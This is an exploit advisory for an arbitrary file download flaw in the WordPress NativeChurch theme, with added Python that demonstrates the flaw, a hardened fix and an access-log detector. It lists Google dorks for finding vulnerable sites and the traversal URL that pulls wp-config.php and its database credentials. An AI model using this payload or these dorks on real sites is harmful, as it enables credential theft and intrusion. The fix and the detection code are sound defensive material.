WordPress NativeChurch Multi-Purpose 5.0.x File Download

Posted Feb 25, 2019
Authored by KingSkrupellos

WordPress NativeChurch Multi-Purpose theme version 5.0.x suffers from a file download vulnerability.

tags | exploit, info disclosure
SHA-256 | d7b8e0584e3077f857027d82e29f12ca17ab213b299ab5b09211c133da31b75a

####################################################################

# Exploit Title : WordPress NativeChurch Multi-Purpose Theme 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link :
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : theme builds for WordPress 3.9 through 5.0.x
# (listed as compatible with Bootstrap 3.x, bbPress 2.5.x and WooCommerce 2.1.x through 3.4.x);
# no fixed theme version is named in this advisory
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:"/wp-content/themes/NativeChurch/download/"
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
NativeChurch is a WordPress theme designed and developed for church, charity,
non-profit and religious websites, and also comes in handy for portfolio and
corporate websites.

####################################################################

# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers
download arbitrary files, because the application fails to sufficiently sanitize
user-supplied input. An attacker can exploit this issue to download any file that the
web server process can read. Information obtained may aid in further attacks.
Attackers can use a browser to exploit this issue.

* The software uses external input to construct a pathname that should be within a
restricted directory (the theme's download/ folder), but it does not neutralize
sequences such as ".." that resolve to a location outside that directory.

####################################################################

# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

The four "../" climb from download/ through NativeChurch/, themes/ and wp-content/ to
the directory that holds wp-config.php. If the site keeps wp-config.php one level above
the document root (a layout WordPress supports), one more "../" is needed. Because the
script reads the file from disk and sends it as a download instead of executing it, the
response is the raw PHP source, including the database settings shown below.

# Example of what the downloaded WordPress MySQL configuration file exposes :
***********************************************************
/** The name of the database for WordPress. */
define('DB_NAME',

/** MySQL database username. */
define('DB_USER',

/** MySQL database password. */
define('DB_PASSWORD',

/** MySQL hostname. */
define('DB_HOST',
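
The traversal pattern the advisory describes, the canonicalisation check that closes it,
and a scan of web-server access logs for exploitation attempts, as an added example.
This is illustrative Python, not the NativeChurch theme's own download.php (which is
PHP); the WordPress-like directory tree, the file contents and the Apache-style log
lines are constructed here for the demonstration. The function names are my own.

```python
"""Added example: path traversal in a download handler, its hardened form, and a
detection over access-log lines. Illustrative code, not the theme's download.php;
the sample tree and log lines are constructed for this demonstration."""
import os
import re
import tempfile
from urllib.parse import parse_qs, unquote, urlsplit

# Location of the vulnerable handler relative to the document root (from the advisory).
DOWNLOAD_DIR = "wp-content/themes/NativeChurch/download"
HANDLER_PATH = "/" + DOWNLOAD_DIR + "/download.php"


def make_fake_site():
    """Build a throwaway WordPress-like tree (constructed, not a real install)."""
    root = tempfile.mkdtemp(prefix="nativechurch-")
    download_dir = os.path.join(root, *DOWNLOAD_DIR.split("/"))
    os.makedirs(download_dir)
    with open(os.path.join(download_dir, "sample.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php\ndefine('DB_NAME', 'constructed_db');\n")
    return root, download_dir


def vulnerable_resolve(download_dir, file_param):
    """The flawed pattern: the already URL-decoded 'file' value is joined onto the
    download directory and nothing rejects '..', so four '../' climb to the site root."""
    return os.path.normpath(os.path.join(download_dir, file_param))


def hardened_resolve(download_dir, file_param):
    """Canonicalise (symlinks resolved on both sides) and refuse any target that is
    not a regular file strictly inside the download directory."""
    base = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(base, file_param))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes download directory: %r" % file_param)
    if not os.path.isfile(target):
        raise FileNotFoundError(target)
    return target


def escapes(download_dir, file_param):
    """True when hardened_resolve refuses the name as a traversal."""
    try:
        hardened_resolve(download_dir, file_param)
    except PermissionError:
        return True
    return False


def is_traversal(file_param):
    """True when any path segment is '..', after decoding twice so that
    '%2e%2e%2f' and the double-encoded '%252e%252e%252f' forms are caught too."""
    decoded = unquote(unquote(file_param))
    return ".." in re.split(r"[/\\]", decoded)


def flag_log_line(line):
    """Return the decoded 'file' value when an access-log line shows a traversal
    attempt against download.php, otherwise None."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if parts.path.lower() != HANDLER_PATH.lower():
        return None
    for value in parse_qs(parts.query).get("file", []):
        if is_traversal(value):
            return unquote(unquote(value))
    return None


# Constructed sample log lines in Apache combined format (not real traffic).
LOG_LINES = [
    '203.0.113.5 - - [25/Feb/2019:10:00:01 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=sample.pdf HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Feb/2019:10:00:02 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3321',
    '203.0.113.9 - - [25/Feb/2019:10:00:03 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=..%252F..%252F..%252F..%252Fwp-config.php HTTP/1.1" 200 3321',
    '198.51.100.7 - - [25/Feb/2019:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 8811',
]


def scan_logs(lines=LOG_LINES):
    """List (line index, decoded file value) for every traversal attempt found."""
    hits = []
    for i, line in enumerate(lines):
        value = flag_log_line(line)
        if value is not None:
            hits.append((i, value))
    return hits


if __name__ == "__main__":
    root, download_dir = make_fake_site()
    payload = "../../../../wp-config.php"
    print("vulnerable ->", vulnerable_resolve(download_dir, payload))
    print("hardened   -> refused:", escapes(download_dir, payload))
    print("hardened   ->", hardened_resolve(download_dir, "sample.pdf"))
    for idx, hit in scan_logs():
        print("log line %d: traversal attempt, file=%s" % (idx, hit))
```

The hardened check compares canonical paths rather than searching the string for "..",
so encoded variants, symlinks and absolute paths are all handled by the same test. The
log scan decodes twice deliberately: a single decode misses the "%252F" form that a
client uses to slip past filters that only decode once.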

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################